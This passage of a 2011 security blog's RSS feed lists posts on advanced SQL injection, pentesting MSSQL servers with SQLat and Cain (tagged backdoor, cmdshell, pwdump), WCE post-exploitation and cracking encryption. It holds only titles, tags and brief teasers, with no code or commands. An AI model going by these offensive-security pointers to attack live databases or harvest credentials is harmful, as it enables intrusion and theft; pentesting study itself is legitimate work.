		<category><![CDATA[encrypted]]></category>
		<category><![CDATA[encryption]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2132</guid>
		<description><![CDATA[]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/08/22/break-how-to-crack-4096-bit-encryption-in-5-minutes/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Advanced SQL Injection @ Defcon 17</title>
		<link>http://www.coresec.org/2011/08/22/advanced-sql-injection-defcon-17/</link>
		<comments>http://www.coresec.org/2011/08/22/advanced-sql-injection-defcon-17/#comments</comments>
		<pubDate>Mon, 22 Aug 2011 19:14:55 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[advanced]]></category>
		<category><![CDATA[defcon]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[presentation]]></category>
		<category><![CDATA[sql]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2111</guid>
		<description><![CDATA[Nice presentation from Joe McCray]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/08/22/advanced-sql-injection-defcon-17/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pentesting MSSQL Servers with SQLat and Cain</title>
		<link>http://www.coresec.org/2011/08/22/pentesting-mssql-servers-with-sqlat-and-cain/</link>
		<comments>http://www.coresec.org/2011/08/22/pentesting-mssql-servers-with-sqlat-and-cain/#comments</comments>
		<pubDate>Mon, 22 Aug 2011 18:22:14 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[1433]]></category>
		<category><![CDATA[abel]]></category>
		<category><![CDATA[audit]]></category>
		<category><![CDATA[auditing]]></category>
		<category><![CDATA[authentication]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[backdooring]]></category>
		<category><![CDATA[cain]]></category>
		<category><![CDATA[cmdshell]]></category>
		<category><![CDATA[command]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[dictionary]]></category>
		<category><![CDATA[execute]]></category>
		<category><![CDATA[execution]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploitation]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[hash]]></category>
		<category><![CDATA[hashes]]></category>
		<category><![CDATA[login]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[mixed]]></category>
		<category><![CDATA[mssql]]></category>
		<category><![CDATA[pass]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[privilege]]></category>
		<category><![CDATA[privileges]]></category>
		<category><![CDATA[pwdump]]></category>
		<category><![CDATA[sam]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[servers]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[sqlat]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[username]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[wordlist]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2082</guid>
		<description><![CDATA[Ok, by now you probably now how much I enjoy hacking, ehm, ehm…sorry!, pentesting. Well for this tutorial I will be pentesting MS SQL Server with SQLat, Freetds, and Cain. Database store and provide access to information and information is power. Sensitive data such as bank account numbers, credit reports, and lots of other important [...]]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/08/22/pentesting-mssql-servers-with-sqlat-and-cain/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Post Exploitation with WCE Presentation &#8211; Amplia Security</title>
		<link>http://www.coresec.org/2011/08/18/post-exploitation-with-wce-presentation-amplia-security/</link>
		<comments>http://www.coresec.org/2011/08/18/post-exploitation-with-wce-presentation-amplia-security/#comments</comments>
		<pubDate>Thu, 18 Aug 2011 18:01:04 +0000</pubDate>
		<dc:creator>enzo</dc:creator>
				<category><![CDATA[Exploits/Vulns]]></category>
		<category><![CDATA[PenTest]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[amplia]]></category>
		<category><![CDATA[audit]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[exploitation]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[hash]]></category>
		<category><![CDATA[pass]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[presentation]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[wce]]></category>

		<guid isPermaLink="false">http://www.coresec.org/?p=2065</guid>
		<description><![CDATA[English: http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf Spanish: http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_spa.pdf]]></description>
		<wfw:commentRss>http://www.coresec.org/2011/08/18/post-exploitation-with-wce-presentation-amplia-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

